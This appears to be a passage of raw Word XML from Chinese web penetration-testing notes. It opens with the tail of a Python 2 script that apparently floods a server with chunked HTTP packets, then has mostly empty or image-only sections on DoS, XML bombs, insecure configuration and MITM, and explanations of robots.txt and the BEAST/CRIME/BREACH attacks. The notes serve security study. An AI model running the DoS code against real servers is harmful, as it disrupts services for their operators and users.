      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chunk_size</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2680FEB2" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">    except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB7AC22" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        print "Connection error!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A537A67" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sys.exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8BAA64" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C14AA87" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDEBB9C" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        resp = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>con.getresponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED01CDA" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        print(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>resp.status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>resp.reason</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EF8E1E" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">    except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612BF435" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">        print "[*] Knock </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>knock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, is anybody there ? (" + str(packet) + "/66)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4470E4" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D"/>
    <w:p w14:paraId="52ABBA49" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">    packet = packet + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21166C3F" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74436BAC" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>con.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5986ADED" w14:textId="77777777" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D"/>
    <w:p w14:paraId="3C128AC1" w14:textId="1ECB5476" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="005E3C1D">
      <w:r>
        <w:t>print "[+] Done!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E1C6CB" w14:textId="7E945719" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="002E21E7"/>
    <w:p w14:paraId="1BDE55DE" w14:textId="7E7FD724" w:rsidR="005E3C1D" w:rsidRDefault="008F52B4" w:rsidP="005E3C1D">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>缓慢</w:t>
      </w:r>
      <w:r w:rsidR="005E3C1D" w:rsidRPr="005E3C1D">
        <w:t>HTTP DoS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E119123" w14:textId="542986EC" w:rsidR="00897641" w:rsidRDefault="008F52B4" w:rsidP="002E21E7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>待更新</w:t>
      </w:r>
      <w:r>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374302AF" w14:textId="0A5EF404" w:rsidR="008F52B4" w:rsidRDefault="008F52B4" w:rsidP="008F52B4">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>SL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>耗尽</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6139368E" w14:textId="4489672D" w:rsidR="005E3C1D" w:rsidRDefault="008F52B4" w:rsidP="002E21E7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>待更新</w:t>
      </w:r>
      <w:r>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A279B7" w14:textId="66480A27" w:rsidR="005E3C1D" w:rsidRDefault="005E3C1D" w:rsidP="002E21E7"/>
    <w:p w14:paraId="74BA6E14" w14:textId="5084C6B4" w:rsidR="008F52B4" w:rsidRDefault="008F52B4" w:rsidP="002E21E7"/>
    <w:p w14:paraId="10C7CC79" w14:textId="1DFA0BE1" w:rsidR="00DB74B0" w:rsidRDefault="00DB74B0" w:rsidP="00DB74B0">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>炸弹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D67CF1" w14:textId="2A6850D0" w:rsidR="00897641" w:rsidRDefault="00DB74B0" w:rsidP="002E21E7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7EF0FC39" wp14:editId="74984074">
            <wp:extent cx="5274310" cy="2684145"/>
            <wp:effectExtent l="0" t="0" r="2540" b="190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4310" cy="2684145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="178B9B9E" w14:textId="0FEDA318" w:rsidR="00897641" w:rsidRDefault="00897641" w:rsidP="002E21E7"/>
    <w:p w14:paraId="2A969A6D" w14:textId="1C343DBB" w:rsidR="00DB74B0" w:rsidRDefault="003B2A05" w:rsidP="004C517F">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>不安全的F</w:t>
      </w:r>
      <w:r>
        <w:t>TP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B30F31F" w14:textId="366B90AC" w:rsidR="003B2A05" w:rsidRDefault="003B2A05" w:rsidP="003B2A05">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E78E12A" wp14:editId="6894FAEF">
            <wp:extent cx="5274310" cy="2908300"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635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4310" cy="2908300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5799D4E6" w14:textId="169EFE69" w:rsidR="003B2A05" w:rsidRDefault="003B2A05" w:rsidP="003B2A05"/>
    <w:p w14:paraId="6C92BE16" w14:textId="1D82622F" w:rsidR="003B2A05" w:rsidRDefault="003B2A05" w:rsidP="004C517F">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不安全的S</w:t>
      </w:r>
      <w:r>
        <w:t>NMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFD63F1" w14:textId="77777777" w:rsidR="003B2A05" w:rsidRPr="003B2A05" w:rsidRDefault="003B2A05" w:rsidP="003B2A05"/>
    <w:p w14:paraId="2ED1476F" w14:textId="6CEFD73C" w:rsidR="003B2A05" w:rsidRDefault="003B2A05" w:rsidP="003B2A05"/>
    <w:p w14:paraId="48210BF6" w14:textId="1BEE46E8" w:rsidR="003B2A05" w:rsidRDefault="00C17661" w:rsidP="004C517F">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不安全的Web管理平台配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF21CB3" w14:textId="69C78255" w:rsidR="00C17661" w:rsidRDefault="004C517F" w:rsidP="00C17661">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中间件或一些we应用系统的后台管理地址泄露，默认账户密码未修改等问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69141519" w14:textId="303DBAE5" w:rsidR="00C17661" w:rsidRDefault="00C17661" w:rsidP="00C17661">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地特权升级</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2418E662" w14:textId="693B2305" w:rsidR="00C17661" w:rsidRDefault="00C17661" w:rsidP="00C17661"/>
    <w:p w14:paraId="1CBB7885" w14:textId="4F1EF69D" w:rsidR="00C17661" w:rsidRDefault="00C17661" w:rsidP="00C17661">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E7BAC0" w14:textId="61F45028" w:rsidR="00C17661" w:rsidRDefault="00C17661" w:rsidP="00C17661"/>
    <w:p w14:paraId="74B40AD6" w14:textId="32A30EC7" w:rsidR="00C17661" w:rsidRPr="00C17661" w:rsidRDefault="00C17661" w:rsidP="00C17661">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11D30919" w14:textId="347AB253" w:rsidR="003B2A05" w:rsidRDefault="003B2A05" w:rsidP="003B2A05"/>
    <w:p w14:paraId="6217DF4F" w14:textId="6B56F798" w:rsidR="00C17661" w:rsidRDefault="00C17661" w:rsidP="003B2A05"/>
    <w:p w14:paraId="0265813A" w14:textId="2CDE337E" w:rsidR="00C17661" w:rsidRDefault="00C17661" w:rsidP="00C17661">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>中间人攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636A3712" w14:textId="7ED7C634" w:rsidR="00C17661" w:rsidRDefault="00C17661" w:rsidP="00C17661">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:t>TTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DBC5FC" w14:textId="77777777" w:rsidR="00C17661" w:rsidRPr="00C17661" w:rsidRDefault="00C17661" w:rsidP="00C17661"/>
    <w:p w14:paraId="682C2734" w14:textId="284714C3" w:rsidR="00C17661" w:rsidRDefault="00C17661" w:rsidP="00C17661">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SNMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F449DE" w14:textId="3BC29900" w:rsidR="00C17661" w:rsidRDefault="00C17661" w:rsidP="00C17661"/>
    <w:p w14:paraId="265D7B7B" w14:textId="026C3B35" w:rsidR="00C17661" w:rsidRDefault="00C17661" w:rsidP="00C17661">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="shorttext"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>旧的，备份和未引用的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1A2B4C" w14:textId="0CF13E47" w:rsidR="002E6F9A" w:rsidRDefault="00FA3B9F" w:rsidP="003B2A05">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何查找旧的、备份的以及未引用的文件，猜就是了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641C9D98" w14:textId="341B084C" w:rsidR="003B2A05" w:rsidRDefault="00C17661" w:rsidP="003B2A05">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74307073" wp14:editId="4E63FA05">
            <wp:extent cx="5274310" cy="2235200"/>
            <wp:effectExtent l="0" t="0" r="254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74310" cy="2235200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C25758A" w14:textId="1DEEF074" w:rsidR="002E6F9A" w:rsidRDefault="002E6F9A" w:rsidP="003B2A05"/>
    <w:p w14:paraId="16621D01" w14:textId="029BD27F" w:rsidR="00ED3C0F" w:rsidRPr="00ED3C0F" w:rsidRDefault="00FA3B9F" w:rsidP="00ED3C0F">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>obots</w:t>
      </w:r>
      <w:r>
        <w:t>.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AE5B16" w14:textId="46E91403" w:rsidR="00ED3C0F" w:rsidRPr="007F025E" w:rsidRDefault="007F025E" w:rsidP="007F025E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B3E7BEB" wp14:editId="685B5F9D">
            <wp:extent cx="5274310" cy="2926080"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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4310" cy="2926080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14710934" w14:textId="77777777" w:rsidR="00ED3C0F" w:rsidRDefault="00ED3C0F" w:rsidP="00ED3C0F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>robots.txt是一个协议，而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346C1EC9" w14:textId="4B2A8EEC" w:rsidR="00FC7FDB" w:rsidRPr="00ED3C0F" w:rsidRDefault="00ED3C0F" w:rsidP="00ED3C0F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当一个搜索蜘蛛访问一个站点时，它会首先检查该站点根目录下是否存在</w:t>
      </w:r>
      <w:r>
        <w:t>robots.txt，如果存在，搜索机器人就会按照该文件中的内容来确定访问的范围；如果该文件不存在，所有的搜索蜘蛛将能够访问网站上所有没有被口令保护的页面。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>网站包含不希望被搜索引擎收录的内容时，才需要使用robots.txt文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334B01A5" w14:textId="5F8ADFEC" w:rsidR="00FC7FDB" w:rsidRDefault="00FC7FDB" w:rsidP="003B2A05"/>
    <w:p w14:paraId="560996D3" w14:textId="4EC93E8A" w:rsidR="00FC7FDB" w:rsidRDefault="00FC7FDB" w:rsidP="00685F03">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>敏感数据暴露</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CBB686" w14:textId="6A7E6457" w:rsidR="00FC7FDB" w:rsidRDefault="00FC7FDB" w:rsidP="00FC7FDB">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Base</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B335406" w14:textId="7693858F" w:rsidR="00FC7FDB" w:rsidRDefault="00FC7FDB" w:rsidP="00FC7FDB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1477C85F" wp14:editId="5A402954">
            <wp:extent cx="5274310" cy="1217930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="127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4310" cy="1217930"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0244AEDB" w14:textId="0476ACB1" w:rsidR="00FC7FDB" w:rsidRDefault="00FC7FDB" w:rsidP="00FC7FDB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15B627B8" wp14:editId="081E8A46">
            <wp:extent cx="3695700" cy="224790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695700" cy="2247900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="472ACDD9" w14:textId="77777777" w:rsidR="00FC7FDB" w:rsidRPr="00FC7FDB" w:rsidRDefault="00FC7FDB" w:rsidP="00FC7FDB"/>
    <w:p w14:paraId="4BB9B4FD" w14:textId="5DE3C5FF" w:rsidR="00FC7FDB" w:rsidRDefault="00FC7FDB" w:rsidP="00FC7FDB">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC7FDB">
        <w:t>BEAST/CRIME/BREACH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D52F44D" w14:textId="0668CED4" w:rsidR="00FC7FDB" w:rsidRDefault="005D738D" w:rsidP="00FC7FDB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>额。。。。。东西太多</w:t>
      </w:r>
      <w:r w:rsidR="003B5029">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了，小编一时半会儿也理解不了，不能用通俗易懂的方式讲出来，老哥们自己看吧</w:t>
      </w:r>
      <w:r w:rsidRPr="005D738D">
        <w:t>https://blog.csdn.net/cheng_fangang/article/details/42294505</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9AC1D3" w14:textId="6046470E" w:rsidR="00360E9E" w:rsidRDefault="00360E9E" w:rsidP="00FC7FDB"/>
    <w:p w14:paraId="23A44A95" w14:textId="77777777" w:rsidR="00360E9E" w:rsidRDefault="00360E9E" w:rsidP="00360E9E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对于</w:t>
      </w:r>
      <w:r>
        <w:t>HTTPS的攻击，多存在于中间人攻击的环境中，主要是针对于HTTPS所使用的压缩算法和CBC加密模式，进行side-channel-attack。这几类攻击的前置条件都比较苛刻，且都需要受害主机提交很多次请求来收集破译关键数据的足够信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CDF2AB" w14:textId="77777777" w:rsidR="00360E9E" w:rsidRDefault="00360E9E" w:rsidP="00360E9E"/>
    <w:p w14:paraId="0320C3B3" w14:textId="12B37272" w:rsidR="00360E9E" w:rsidRDefault="00360E9E" w:rsidP="00360E9E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见的攻击方法，主要有，</w:t>
      </w:r>
      <w:r>
        <w:t>BEAST Lucky-13 RC4 Biases CRIME TIME BREACH等。主要对其中三中进行介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2DB775" w14:textId="77777777" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186"/>
    <w:p w14:paraId="4F79F462" w14:textId="3F8F9078" w:rsidR="00996186" w:rsidRPr="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Compression Ratio Info-leak Made Easy</w:t>
      </w:r>
      <w:r w:rsidRPr="00996186">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>（C</w:t>
      </w:r>
      <w:r w:rsidRPr="00996186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>RIME</w:t>
      </w:r>
      <w:r w:rsidRPr="00996186">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071C90EF" w14:textId="58C28D5B" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者控制受害者发送大量请求，利用压缩算法的机制猜测请求中的关键信息，根据</w:t>
      </w:r>
      <w:r>
        <w:t>response长度判断请求是否成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0439BFD0" w14:textId="7DA6DCF5" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下面的</w:t>
      </w:r>
      <w:r>
        <w:t>https头，攻击这可以控制的部分为get请求地址，想要猜测的部分为Cookie。那么攻击者只需要在GET地址处，不断变换猜测字符串，进行猜测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057799D8" w14:textId="77777777" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186"/>
    <w:p w14:paraId="1BB5573E" w14:textId="176BBDDE" w:rsidR="00996186" w:rsidRPr="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996186">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Browser Exploit Against SSL/TLS (BEAST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AA22CB" w14:textId="4C22B641" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者控制受害者发送大量请求，利用</w:t>
      </w:r>
      <w:r>
        <w:t>CBC加密模式猜测关键信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481A6681" w14:textId="41E6BE63" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:t>CBC模式工作的方法是当加密第</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>块的时候，和第i-1块的密文异或。更正式地表达如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF9BF77" w14:textId="57B7D156" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:t>Ci= E(Key, Ci-1 ⊕ Mi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DDADEF" w14:textId="0D282248" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很显然，当你加密第一块的时候，没有前一块的密文和它异或，因此，标准的做法是产生一个随机的初始化向量（</w:t>
      </w:r>
      <w:r>
        <w:t>IV），并且用它和第一块明文异或。第一块M0的加密如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28485ABA" w14:textId="5855AA3D" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:t>C0= E(Key, IV ⊕ M0).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ACCC2C" w14:textId="354ECD7A" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，接着第一块</w:t>
      </w:r>
      <w:r>
        <w:t>M1加密如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C25CD89" w14:textId="2B2D8A87" w:rsidR="00996186" w:rsidRDefault="00996186" w:rsidP="00996186">
      <w:r>
        <w:t>C1= E(Key, C0 ⊕ M1).</w:t>
      </w:r>
